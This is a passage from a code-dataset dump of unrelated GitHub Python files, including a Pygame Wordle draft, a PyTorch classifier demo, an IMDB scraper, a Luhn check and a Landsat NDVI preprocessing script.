deleteButton.move(160, 260)\n\n def clicked():\n for note in self.parent.allNotes:\n if notesList.currentItem().text() == note.title:\n NoteHelper.deleteNote(self.parent.token, note)\n self.parent.allNotes = NoteHelper.getAllNotes(self.parent.token)\n notesList.removeItemWidget(notesList.currentItem())\n\n deleteButton.clicked.connect(clicked)\n\n\n deleteDialog.exec_()\n\n def getNotesList(self, window) -> QListWidget:\n notesList = QListWidget(window)\n notesList.resize(400, 250)\n try:\n for note in self.parent.allNotes:\n tempItem = QListWidgetItem(note.title)\n notesList.addItem(tempItem)\n except:\n pass\n return notesList\n '''","repo_name":"meowosaurus/FraUASNotes","sub_path":"client/View/Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27242373216","text":"import webbrowser\n\n\"\"\"\nThis class intends to handle the movie object\nAt this moment, it only has a constructor setter\n\"\"\"\n\n\nclass Movie():\n def __init__(self, title, story_line, poster_image_url, youtube_url):\n self.title = title\n self.story_line = story_line\n self.poster_image_url = poster_image_url\n self.trailer_youtube_url = youtube_url\n","repo_name":"alexandremlucas/movie-trailer-website","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26894491573","text":"from flask import Flask\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/medianotas///\")\r\ndef medianotas(x,y,z):\r\n soma = float(x) + float(y) + float(z)\r\n media = soma/3\r\n if(media>=60):\r\n return \"Você foi aprovado\"\r\n elif(media<60):\r\n return \"Você foi reprovado\"\r\n\r\n ","repo_name":"leticiagraziellegomes/flask","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15333011360","text":"import pygame\nimport sys\nimport urllib.request\nimport os\n\n\nclass Game:\n def __init__(self):\n pygame.font.init()\n pygame.init()\n self.flag = [1,1] # [0] - switch pages\n self.ui = UI()\n self.ui.start_page()\n self.ui.game_page()\n # получение размеров экрана\n self.clock = pygame.time.Clock()\n # Скачивание ��азы данных со словами на 5 букв и сохранение в файле\n filename = \"words.txt\"\n if not os.path.exists(filename):\n url = \"https://raw.githubusercontent.com/dwyl/english-words/master/words_alpha.txt\"\n urllib.request.urlretrieve(url, filename)\n # Чтение файла в переменную\n with open(filename) as f:\n words = f.read().splitlines()\n\n # Отбор слов из базы данных со словами на 5 букв\n self.five_letter_words = [word.lower() for word in words if len(word) == 5]\n\n def disp_st_pg(self):\n self.ui.start_page()\n pygame.draw.rect(self.ui.screen, (255, 0, 0), self.ui.rect)\n mouse_pos = pygame.mouse.get_pos()\n self.ui.button_exit.draw(self.ui.screen, mouse_pos)\n self.ui.button_start.draw(self.ui.screen, mouse_pos)\n\n def disp_game_pg(self):\n self.ui.game_page()\n mouse_pos = pygame.mouse.get_pos()\n pygame.draw.rect(self.ui.screen, (255, 0, 0), self.ui.rect1)\n self.ui.button__back_to_menu.draw(self.ui.screen, mouse_pos)\n self.ui.input_box.update()\n # self.ui.screen.fill((30, 30, 30))\n self.ui.input_box.draw(self.ui.screen)\n\n\n def run(self):\n while True:\n self.clock.tick(60)\n # Обработка событий\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.flag[0] ==1:\n if self.ui.button_start.rect.collidepoint(event.pos):\n self.flag[0] = -self.flag[0]\n elif self.ui.button_exit.rect.collidepoint(event.pos):\n pygame.quit()\n sys.exit()\n elif self.flag[0] == -1:\n if self.ui.button__back_to_menu.rect.collidepoint(event.pos):\n self.flag[0] = -self.flag[0]\n elif self.ui.input_box.rect.collidepoint(pygame.mouse.get_pos()) and self.flag[0] == -1:\n self.ui.input_box.handle_event(event)\n \n \n # Отрисовка экрана\n self.ui.screen.fill((120, 255, 175))\n if self.flag[0] == 1:\n self.disp_st_pg()\n elif self.flag[0] == -1:\n self.disp_game_pg()\n \n pygame.display.flip()\nclass Button:\n def __init__(self, x, y, w, h, color, active_color, text=''):\n self.rect = pygame.Rect(x, y, w, h)\n self.color = color\n self.active_color = active_color\n self.text = text\n def draw(self, screen, mouse_pos):\n if self.rect.collidepoint(mouse_pos):\n pygame.draw.rect(screen, self.active_color, self.rect)\n else:\n pygame.draw.rect(screen, self.color, self.rect)\n if self.text:\n font = pygame.font.Font(None, 20)\n text = font.render(self.text, True, (0, 0, 0))\n text_rect = text.get_rect(center=self.rect.center)\n screen.blit(text, text_rect)\n\nclass InputBox:\n def __init__(self, x, y, w, h, font=None, font_size=30):\n self.rect = pygame.Rect(x, y, w, h)\n self.color = pygame.Color('lightskyblue3')\n self.text = ''\n self.font = font or pygame.font.Font(None, font_size)\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect\n self.active = not self.active\n # Change the current color of the input box.\n self.color = pygame.Color('dodgerblue2') if self.active else pygame.Color('lightskyblue3')\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_RETURN:\n # return text and deactivate\n entered_text = self.text\n self.text = ''\n self.active = False\n return entered_text\n elif event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += event.unicode\n\n def update(self):\n # Resize the box if the text is too long.\n width = max(200, self.font.size(self.text)[0]+10)\n self.rect.w = width\n\n def draw(self, screen):\n # Blit the text.\n txt_surface = self.font.render(self.text, True, self.color)\n # Resize the box if the text is too long.\n width = max(200, self.font.size(self.text)[0]+10)\n self.rect.w = width\n # Blit the rect.\n pygame.draw.rect(screen, self.color, self.rect, 2)\n # Blit the text.\n screen.blit(txt_surface, (self.rect.x+5, self.rect.y+5))\n\n\nclass UI:\n def __init__(self):\n self.screen_info = pygame.display.Info()\n self.screen_width = self.screen_info.current_w\n self.screen_height = self.screen_info.current_h\n temp = min(self.screen_height, self.screen_height)\n self.screen = pygame.display.set_mode((temp//2, temp//2))\n\n def start_page(self):\n \"\"\" Here we are drawing all the elements on the start page\"\"\"\n # отрисовка прямоугольника на экране\n self.rect = pygame.Rect(250, 250, 100, 100)\n self.button_start = Button(100, 100, 50, 30, (255, 0, 0), (0, 255, 0), 'Click me')\n self.button_exit = Button(0, 0, 50, 30, (255, 0, 0), (0, 255, 0), 'exit')\n\n\n def game_page(self):\n self.rect1 = pygame.Rect(180, 200, 100, 100)\n self.button_enter_word = Button(100, 100, 50, 30, (255, 0, 0), (0, 255, 0), 'Enter word')\n self.button__back_to_menu = Button(400, 300, 50, 30, (255, 0, 0), (0, 255, 0), 'Back to menu')\n self.button__restart = Button(100, 100, 50, 30, (255, 0, 0), (0, 255, 0), 'Restart')\n self.input_box = InputBox(100, 100, 140, 32)\n \nclass Word:\n def __init__(self, word):\n # инициализация слова\n pass\n \n def check_letter(self, letter):\n # проверка, есть ли буква в слове\n pass\n \n def is_guessed(self):\n # проверка, угадано ли слово полностью\n pass \n\n\nif __name__ == \"__main__\":\n game = Game()\n game.run()","repo_name":"MPHRS/Wordle-game","sub_path":"wordle_game/not_ready.py","file_name":"not_ready.py","file_ext":"py","file_size_in_byte":6981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42347965818","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\n\nfrom class_DeepHit import Model_DeepHit\nfrom tf_slim import fully_connected as FC_Net\nfrom import_data import f_get_Normalization\n\n####################################\n# Load model \n\ntf.compat.v1.disable_eager_execution()\n\ndef load_logging(filename):\n data = dict()\n with open(filename) as f:\n def is_float(input):\n try:\n num = float(input)\n except ValueError:\n return False\n return True\n\n for line in f.readlines():\n if ':' in line:\n key,value = line.strip().split(':', 1)\n if value.isdigit():\n data[key] = int(value)\n elif is_float(value):\n data[key] = float(value)\n elif value == 'None':\n data[key] = None\n else:\n data[key] = value\n else:\n pass \n return data\n\n# Load the saved optimized hyperparameters\n\nin_hypfile = 'model/hyperparameters_log.txt'\nin_parser = load_logging(in_hypfile)\n\n# Forward the hyperparameters\nmb_size = in_parser['mb_size']\n\niteration = in_parser['iteration']\n\nkeep_prob = in_parser['keep_prob']\nlr_train = in_parser['lr_train']\n\nh_dim_shared = in_parser['h_dim_shared']\nh_dim_CS = in_parser['h_dim_CS']\nnum_layers_shared = in_parser['num_layers_shared']\nnum_layers_CS = in_parser['num_layers_CS']\n\nif in_parser['active_fn'] == 'relu':\n active_fn = tf.nn.relu\nelif in_parser['active_fn'] == 'elu':\n active_fn = tf.nn.elu\nelif in_parser['active_fn'] == 'tanh':\n active_fn = tf.nn.tanh\nelse:\n print('Error!')\n\n\ninitial_W = tf.keras.initializers.glorot_normal()\n\nalpha = in_parser['alpha'] #for log-likelihood loss\nbeta = in_parser['beta'] #for ranking loss\n\n\n# Create the dictionaries \n# For the input settings\ninput_dims = { 'x_dim' : 96,\n 'num_Event' : 2,\n 'num_Category' : 143}\n\n# For the hyperparameters\nnetwork_settings = { 'h_dim_shared' : h_dim_shared,\n 'h_dim_CS' : h_dim_CS,\n 'num_layers_shared' : num_layers_shared,\n 'num_layers_CS' : num_layers_CS,\n 'active_fn' : active_fn,\n 'initial_W' : initial_W }\n\n# Create the DeepHit network architecture\n\ntf.compat.v1.reset_default_graph()\n\n#imported_graph = tf.compat.v1.train.import_meta_graph('model/model_itr_0.meta')\n\n#with tf.compat.v1.Session() as sess:\n # restore the saved vairable\n \n# imported_graph.restore(sess,'models/checkpoint')\n \n# model = Model_DeepHit(sess, \"DeepHit\", input_dims, network_settings)\n\ntf.compat.v1.reset_default_graph()\n\nconfig = tf.compat.v1.ConfigProto\n\nsess = tf.compat.v1.Session()\n\nmodel = Model_DeepHit(sess, \"DeepHit\", input_dims, network_settings)\n\nsaver = tf.compat.v1.train.Saver()\n\nsess.run(tf.compat.v1.global_variables_initializer())\n\n# Restoring the trained model\nsaver.restore(sess, 'model/model/model_itr_0')\n\n\n##########################################\n# import data and predict\n\nprocessed_data = pd.read_csv('data/NASH_test_df.csv', index_col=0)\n\nget_x = lambda df: (df\n .drop(columns=[\"event\",\"wl_to_event\",\"PX_ID\"])\n .values.astype('float32'))\n\ndata = np.asarray(get_x(processed_data))\n\ndata = f_get_Normalization(data, 'standard')\n\n#prediction and convert to dataframe\npred = model.predict(data)\n\nm,n,r = pred.shape\nout_arr = np.column_stack((np.repeat(np.arange(m),n),pred.reshape(m*n,-1)))\nout_df = pd.DataFrame(out_arr)\n\nout_no_index = out_df.iloc[: , 1:]\n\nout_no_index.to_csv('pred_risk.csv')\n\n\npred_death_risk = out_no_index.iloc[::2, :].reset_index()\npred_death_risk= pred_death_risk.drop(['index'],axis=1)\npred_transplant_risk = out_no_index.iloc[1:, :]\npred_transplant_risk = pred_transplant_risk.iloc[::2, :].reset_index()\npred_transplant_risk= pred_transplant_risk.drop(['index'],axis=1)\npred_death_risk.to_csv(\"pred_risk_death.csv\")\npred_transplant_risk.to_csv(\"pred_risk_transplant.csv\")\n","repo_name":"irieyj-sun/nash-trajectory","sub_path":"DeepNash/load_model_predict.py","file_name":"load_model_predict.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21022431473","text":"#coding=utf-8\n\nimport torch\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torch import nn,optim\n \n# 生成数据\ncluster = torch.ones(500, 2) \ndata0 = torch.normal(4*cluster, 2) \ndata1 = torch.normal(-4*cluster, 1) \ndata2 = torch.normal(-8*cluster, 1) \nlabel0 = torch.zeros(500)\nlabel1 = torch.ones(500) \nlabel2 = label1*2 #500个标签2\n \nx = torch.cat((data0, data1, data2), ).type(torch.FloatTensor) \ny = torch.cat((label0, label1, label2), ).type(torch.LongTensor) \n \nplt.scatter(x.numpy()[:, 0], x.numpy()[:, 1], c=y.numpy(), s=10, lw=0, cmap='RdYlGn')\nplt.show()\n\nclass Net(nn.Module): \n def __init__(self, input_feature, num_hidden,outputs):\n super(Net, self).__init__() \n self.hidden = nn.Linear(input_feature, num_hidden) # 线性隐含层\n self.out = nn.Linear(num_hidden, outputs) # 输出层\n\n def forward(self, x):\n x = F.relu(self.hidden(x)) # 激励函数ReLU处理隐含层的输出\n x = self.out(x)\n x = F.softmax(x) #使用softmax将输出层的数据转换成概率值 \n return x\n\nCUDA = torch.cuda.is_available()\n\nif CUDA:\n net = Net(input_feature=2, num_hidden=20,outputs=3).cuda()\n inputs = x.cuda()\n target = y.cuda()\nelse:\n net = Net(input_feature=2, num_hidden=20,outputs=3)\n inputs = x\n target = y\n\noptimizer = optim.SGD(net.parameters(), lr=0.02)\ncriterion = nn.CrossEntropyLoss()\n\ndef draw(output):\n if CUDA:\n output=output.cpu()\n plt.cla()\n output = torch.max((output), 1)[1] \n pred_y = output.data.numpy().squeeze()\n target_y = y.numpy()\n plt.scatter(x.numpy()[:, 0], x.numpy()[:, 1], c=pred_y, s=10, lw=0, cmap='RdYlGn')\n accuracy = sum(pred_y == target_y)/1500.0 \n plt.text(1.5, -4, 'Accuracy=%s' % (accuracy), fontdict={'size': 20, 'color': 'red'})\n plt.pause(0.1)\n\ndef train(model,criterion,optimizer,epochs):\n for epoch in range(epochs):\n #forward\n output = model(inputs)\n \n loss = criterion(output,target)\n\n #backward\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if epoch % 40 == 0:\n draw(output)\n\n\ntrain(net,criterion,optimizer,10000)\n\n","repo_name":"youarenotaloneor/pytorch_machine_laerning","sub_path":"CH3/7_MultiClass.py","file_name":"7_MultiClass.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18225649055","text":"# /**\n# * @author Rajat Verma\n# * https://www.linkedin.com/in/rajat-v-3b0685128/\n# * https://github.com/rajatt95\n# * https://rajatt95.github.io/\n# *\n# * Course: Learn API Automation Testing with Python & BDD Framework (https://www.udemy.com/course/python-sdet-rest-api-automation/)\n# * Tutor: Rahul Shetty (https://www.udemy.com/user/rahul445/)\n# */\n#\n# /***************************************************/\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nresponseData = requests.get(\"https://www.imdb.com/find?q=thriller&ref_=nv_sr_sm\")\nsoup = BeautifulSoup(responseData.content, 'html.parser')\ntable_movies_thriller = soup.find('table', {'class': 'findList'})\ntable_movies_thriller_Rows = table_movies_thriller.findAll('tr')\n\nfor row in table_movies_thriller_Rows:\n dataInRow = row.findAll('td')\n # a -> anchor tag\n print(dataInRow[1].a.text) # Thriller - en grym film\n\n # Get the value of attribute 'href' in 'anchor' tag\n print(dataInRow[1].a['href']) # /title/tt0072285/\n\n sub_URL = dataInRow[1].a['href']\n sub_data = requests.get('https://www.imdb.com'+sub_URL)\n childSoup = BeautifulSoup(sub_data.content, 'html.parser')\n\n # Not in scope now\n # genre = childSoup.find('div', {'class': 'see-more inlinecanwrap'})\n # print(genre.a.text)\n\n links = childSoup.find('li', {'class': 'ipc - inline - list__item'})\n print(links)\n\n","repo_name":"rajatt95/Python_RS","sub_path":"Python_Basics/24_07_WebScrapping_NavigateToNextPage.py","file_name":"24_07_WebScrapping_NavigateToNextPage.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29965648337","text":"\ndef valid_credit_card(number):\n s = str(number)\n sum1 = sum([f(s[i]) for i in range(len(s)-2,-1,-2)])\n sum2 = sum([int(s[i]) for i in range(len(s)-3,-1,-2)])\n return 9 * (sum1 + sum2) % 10 == int(s[-1])\n \ndef f(s):\n x = 2*int(s)\n if x > 9:\n x = x-9\n return x\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"XKEDTh2NMtTLSyCc2_7.py","file_name":"XKEDTh2NMtTLSyCc2_7.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71114585692","text":"def SelectionSort(A):\n for i in range(len(A)):\n least = i\n for k in range(i + 1 , len(A)):\n if A[k] < A[least]:\n least = k\n \n swap(A, least, i)\n \n \ndef swap(A, x, y):\n temp = A[x]\n A[x] = A[y]\n A[y] = temp\n\t \n \nA = [54, 26, 93, 17, 77, 31, 44, 55, 20]\nSelectionSort(A)\nprint(A) \n","repo_name":"careermonk/data-structures-and-algorithmic-thinking-with-python","sub_path":"src/chapter10sorting/SeletionSort.py","file_name":"SeletionSort.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":673,"dataset":"github-code","pt":"32"} +{"seq_id":"4792149613","text":"\n# coding: utf-8\n\n# In[143]:\n\n\nimport os\nfrom osgeo import gdal\nimport osr\nfrom copy import deepcopy\nimport numpy as np\n\n## Define functions\ndef raster2array(rasterfn,i):\n raster = gdal.Open(rasterfn)\n band = raster.GetRasterBand(i)\n return band.ReadAsArray()\n\ndef array2raster(rasterfn,newRasterfn,array):\n raster = gdal.Open(rasterfn)\n geotransform = raster.GetGeoTransform()\n originX = geotransform[0]\n originY = geotransform[3]\n pixelWidth = geotransform[1]\n pixelHeight = geotransform[5]\n cols = raster.RasterXSize\n rows = raster.RasterYSize\n\n driver = gdal.GetDriverByName('GTiff')\n outRaster = driver.Create(newRasterfn, cols, rows, 1, gdal.GDT_Float32)\n outRaster.SetGeoTransform((originX, pixelWidth, 0, originY, 0, pixelHeight))\n outband = outRaster.GetRasterBand(1)\n outband.WriteArray(array)\n outRasterSRS = osr.SpatialReference()\n outRasterSRS.ImportFromWkt(raster.GetProjectionRef())\n outRaster.SetProjection(outRasterSRS.ExportToWkt()) \n \nbit_flags = {\n \"5\": {\n \"Fill\": [0],\n \"Clear\": [1],\n \"Water\": [2],\n \"Cloud Shadow\": [3],\n \"Snow\": [4],\n \"Cloud\": [5],\n \"Low Cloud Confidence\": [6],\n \"Medium Cloud Confidence\": [7],\n \"High Cloud Confidence\": [6, 7]\n },\n \"7\": {\n \"Fill\": [0],\n \"Clear\": [1],\n \"Water\": [2],\n \"Cloud Shadow\": [3],\n \"Snow\": [4],\n \"Cloud\": [5],\n \"Low Cloud Confidence\": [6],\n \"Medium Cloud Confidence\": [7],\n \"High Cloud Confidence\": [6, 7]\n },\n \"8\": {\n \"Fill\": [0],\n \"Clear\": [1],\n \"Water\": [2],\n \"Cloud Shadow\": [3],\n \"Snow\": [4],\n \"Cloud\": [5],\n \"Low Cloud Confidence\": [6],\n \"Medium Cloud Confidence\": [7],\n \"High Cloud Confidence\": [6, 7],\n \"Low Cirrus Confidence\": [8],\n \"Medium Cirrus Confidence\": [9],\n \"High Cirrus Confidence\": [8, 9],\n \"Terrain Occlusion\": [10]\n }\n }\n# import numpy as np\n# a=raster2array('C:\\\\Users\\\\GraceLiu\\Downloads\\\\LC08_CU_001008_20170824_20181121_C01_V01_SR\\\\LC08_CU_001008_20170824_20181121_C01_V01_PIXELQA.tif',1)\n# test = a[1000:1010,1000:1010]\n# sensor = 'L8'\n# output_bands = ['Cloud Shadow','Water',\"High Cloud Confidence\"]#\"High Cloud Confidence\"]\n# use bit logic to return only target values\ndef extract_bits(in_rasterarray,sensor,output_bands):\n in_rasterarray = raster2array(in_rasterarray,1) \n bit_bool_output = np.ones([in_rasterarray.shape[0],in_rasterarray.shape[1]])\n for bv in output_bands:\n bit_bool = np.zeros([in_rasterarray.shape[0],in_rasterarray.shape[1]])\n for row in range(in_rasterarray.shape[0]):\n for col in range(in_rasterarray.shape[1]):\n v = in_rasterarray[row,col]\n bit_value = bit_flags[sensor][bv] \n if len(bit_value) == 1: # single bit\n # copy the dictionary and remove the desired single bit element\n temp_bit_flags = deepcopy(bit_flags[sensor])\n del temp_bit_flags[bv]\n # search the rest of dictionary and see if the desired bit exists in other elements (2-bit attribute)\n two_bit_elem = bit_value[0] in [p for q in temp_bit_flags.values() for p in q]\n if two_bit_elem:\n print(two_bit_elem)\n # if the bit exists in a 2-bit element, check the status of the adjacent bit\n for flags, value in bit_flags[sensor].iteritems():\n # if previous bit is 1, then pass\n if value == [bit_value[0]-1,bit_value[0]]:\n if v & 1 << (bit_value[0]-1) > 0: # Check the neighbour bit\n pass\n else:\n bit_bool[row,col]=(v & 1 << bit_value[0] > 0)\n # if next bit is 1, then pass\n elif value == [bit_value[0],bit_value[0]+1]:\n if v & 1 << (bit_value[0]+1) > 0: # Check the neighbour bit\n pass\n else:\n bit_bool[row,col]=(v & 1 << bit_value[0] > 0)\n else:\n bit_bool[row,col]=(v & 1 << bit_value[0] > 0)\n\n elif len(bit_value) > 1: # 2+ bits\n bits = []\n for b in bit_value:\n bits.append(v & 1 << b > 0)\n if all(bits):\n bit_bool[row,col]=(True)\n else:\n bit_bool[row,col]=(False)\n # return raster values that match bit(s)\n bit_bool=1-bit_bool\n bit_bool_output=np.multiply(bit_bool_output, bit_bool)\n return(bit_bool_output)\n\n# In[33]:\n\n\n# This code is for processing the raw ARD data to clean NDVI\n# ########################################################################################################################\n# ###~~~~~~~~~~~~~~STEP ONE Unzip/Clipping/reproject/QC~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n# ########################################################################################################################\nimport shutil\nimport glob,math,json,ogr\nfrom datetime import datetime\nfrom osgeo.gdalnumeric import *\nfrom osgeo.gdalconst import *\nimport sys\n\n# # Define Directories\nSatellites = ['LT05','LE07','LC08']\nSiteName = 'SFREC'\nProjection = 'EPSG:32610'#WGS84 EPSG:4326'; EPSG:32610 WGS84 utm zone 10 N #'EPSG:26910'# NAD83 utm zone 10 N\nARD_Box = '-2143000 2098000 -2130000 2084000'## xmin ymax xmax ymin\nUTM_Box = '642770 4342784 649834 4352876'## xmin ymin xmax ymax\n# need to add the te_srs parameter in gralwarp because 042035 is in UTM 11\nHHHVVV = '002008' # Horizontal tile number and Vertical tile number\nLandsat_org_tar_Path ='/z0/Group/Satellite_Data/LandSat/ARD/'+HHHVVV #Zipped file directory\nLandsat_Raw_Path = '/z0/Group/Satellite_Data/LandSat/ARD/'+HHHVVV+ '_Unziped' # Where extracted data are saved\nLandsat_Clip_Path = '/z0/lh349796/Rangeland/landsat_data/ARD/'+HHHVVV+'/I_Clipped_data/'+ SiteName + '/'#'/z0/lh349796/Rangeland/landsat_data/ARD//I_Reprojected_data/'+ SiteName\nLandsat_Inputs_Path = '/z0/lh349796/Rangeland/landsat_data/ARD/'+HHHVVV+'/II_Input_data/'+ SiteName + '/'#'/z0/lh349796/Rangeland/landsat_data/ARD/I_Clipped_data/'+ SiteName #Where reprojected and clipped data are saved\nCloud_threshold = {\n \"5\": [\"Cloud Shadow\",\"Cloud\",\"High Cloud Confidence\"],\n \"7\": [\"Cloud Shadow\",\"Cloud\",\"High Cloud Confidence\"],\n \"8\": [\"Cloud Shadow\",\"Cloud\",\"High Cloud Confidence\",\"High Cirrus Confidence\"]\n }\n\nif not os.path.exists(Landsat_Raw_Path):\n os.makedirs(Landsat_Raw_Path)\nif not os.path.exists(Landsat_Clip_Path):\n os.makedirs(Landsat_Clip_Path)\nif not os.path.exists(Landsat_Inputs_Path):\n os.makedirs(Landsat_Inputs_Path)\n \n## Define functions\ndef ClipbyBox(rasterfn,orirasterfn,cliprasterfn,bound):\n current_file = os.path.join(orirasterfn, rasterfn)\n export_file = os.path.join(cliprasterfn, rasterfn)\n os.system('gdal_translate -of GTiff -projwin ' + bound + ' \"' + current_file + '\" \"' + export_file + '\"')\n\n \n#~Step1.1: unzip .tar files\n# ## for python 3.5+\n# Files = glob.glob(Landsat_org_tar_Path + '/**/*.tar', recursive=True)\n# ## Landsat_org_tar_Path/ the dir\n# ## **/ every file and dir under my_path\n# ## *.tar every file that ends with '.tar'\n# for python 3.5-\n# import fnmatch\n# Files = []\n# for root, dirnames, filenames in os.walk(Landsat_org_tar_Path):\n# for filename in fnmatch.filter(filenames, '*.tar'):\n# Files.append(os.path.join(root, filename))\n# for file in Files:\n# if file.endswith(\"SR.tar\"):\n# print(\"1.1-Extracting \"+file)\n# # FileName = os.path.join(Landsat_org_tar_Path, file)\n# os.system('tar xvf \"' + file + '\" -C ' + Landsat_Raw_Path)\n## Loop through file directory, create a list of date and band\ndate = []\nfor file in os.listdir(Landsat_Raw_Path):\n if file.endswith(\".tif\"):\n date.append(file.split('_')[3])\nDatelist = list(set(date))\n# #~Step1.2: Clip XXX.tif using ard box\n# In_Directory = [Landsat_Raw_Path]\n# print(\"1.2-Reprojecting and cliping...\")\n# for directory in In_Directory:\n# for file in os.listdir(directory):\n# if file.startswith(('LT05','LE07')):\n# if file.endswith(('SRB3.tif','SRB4.tif','PIXELQA.tif')):\n# print('1.2-Working on '+ file)\n# ClipbyBox(file,Landsat_Raw_Path, Landsat_Clip_Path,ARD_Box)\n# elif file.startswith('LC08'):\n# if file.endswith(('SRB4.tif','SRB5.tif','PIXELQA.tif')):\n# print('1.2-Working on '+ file)\n# ClipbyBox(file,Landsat_Raw_Path, Landsat_Clip_Path,ARD_Box)\n# print(\"1.2-Done!\")\n#~Step1.3: Calculate NDVI.tif and NDVIclean.tif\nfor date in Datelist:\n print('1.3-Calculating NDVI for '+date + '...')\n for satellite in Satellites:\n print('1.3-Finding ' + satellite +'...')\n paths = glob.glob(os.path.join(Landsat_Clip_Path,satellite+'*'+date+'_[0-9]*SRB*.tif'))\n if paths:\n QA_path = glob.glob(os.path.join(Landsat_Clip_Path,satellite+'*'+date+'_[0-9]*PIXELQA.tif'))\n if QA_path:\n infile = QA_path[0]\n sensor = os.path.basename(QA_path[0])[3]\n print('1.3-unpacking QA band for L'+ sensor + ' ' + date)\n qa_mask = extract_bits(infile,sensor,Cloud_threshold[sensor])#0 means noise pixel 1 means clean pixel\n print ('1.3-QA band ' + os.path.basename(QA_path[0]) + 'unpacked' )\n else:\n print('1.3-QA band does not exists for' + satellite + ' ' + date)\n paths.sort(key = lambda x: x.split('_')[-1])\n if len(paths)<2:\n print('1.3-missing RED or NIR band needed for calculating NDVI...')\n elif len(paths)==2:\n RED = raster2array(paths[0],1)\n NIR = raster2array(paths[1],1)\n NDVI = (1.0*NIR-RED)/(NIR+RED)\n filename = os.path.basename(paths[0])[:-8]+'NDVI.tif'\n array2raster(paths[0],os.path.join(Landsat_Clip_Path,filename),NDVI)\n NDVI_clean = np.multiply(NDVI,qa_mask)\n filename = os.path.basename(paths[0])[:-8]+'NDVIclean.tif'\n array2raster(paths[0],os.path.join(Landsat_Clip_Path,filename),NDVI_clean)\n #else:\n # print('1.3-no '+ satellite + ' image exists for ' + date)\n#~Step1.4: clip and reproject NDVIclean.tif\nIn_Directory = [Landsat_Clip_Path]\nfor directory in In_Directory:\n for file in os.listdir(directory):\n if file.endswith('NDVIclean.tif'):\n current_file = os.path.join(directory, file)\n export_file = os.path.join(Landsat_Inputs_Path, file)\n print(\"Reprojecting -raster data will be resampled when being reprojected - and clipping data \" + file)\n os.system('gdalwarp -overwrite -t_srs \"' + Projection + '\" -tr 30 30 -r near -te ' + UTM_Box + ' \"' + current_file + '\" \"' + export_file + '\"')\n print(\"done!\")\n\n","repo_name":"GraceHLiu/Chapter2_SatelliteRangeland","sub_path":"I_LandsatARD_Preprocess.py","file_name":"I_LandsatARD_Preprocess.py","file_ext":"py","file_size_in_byte":11498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25490739363","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/minimum-deletions-to-make-string-balanced/\n# Author: Miao Zhang\n# Date: 2021-05-25\n\nclass Solution:\n def minimumDeletions(self, s: str) -> int:\n n = len(s)\n dp = [0] * (n + 1)\n b = 0\n for i, c in enumerate(s):\n if c == 'b':\n dp[i + 1] = dp[i]\n b += 1\n else:\n dp[i + 1] = min(b, dp[i] + 1)\n return dp[n]\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/minimumDeletionstoMakeStringBalanced/minimumDeletionstoMakeStringBalanced.py","file_name":"minimumDeletionstoMakeStringBalanced.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42303771983","text":"import numpy as np\nimport timeit\nimport datetime\nimport copy\nimport argparse\nfrom keras.models import load_model\nimport read_data\nimport group_fairness\nimport individual_fairness\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default=\"german\", type=str, nargs='?', help='dataset')\nparser.add_argument('--sensitive', default=\"age\", type=str, nargs='?', help='sensitive feature')\nparser.add_argument('--validation_size', default=\"0.05\", type=str, nargs='?', help='validation size')\nparser.add_argument('--test_size', default=\"0.05\", type=str, nargs='?', help='test size')\nparser.add_argument('--method', default=\"roc\", type=str, nargs='?', help='method')\nparser.add_argument('--budget', default=\"50\", type=str, nargs='?', help='budget')\nparser.add_argument('--fair_constraint', default=\"max\", type=str, nargs='?', help='fairness constraint')\nparser.add_argument('--n_run', default=\"5\", type=str, nargs='?', help='no of running times')\nargs = parser.parse_args()\nprint(\"dataset: {}, sensitive: {}, validation_size: {}, test_size: {}, \"\n \"method: {}, budget: {}, fair_constraint: {}, n_run: {}\".\n format(args.dataset, args.sensitive, args.validation_size, args.test_size,\n args.method, args.budget, args.fair_constraint, args.n_run))\n\ndataset = args.dataset\nsensitive = args.sensitive\nvalid_size = float(args.validation_size)\ntest_size = float(args.test_size)\nmethod = args.method # 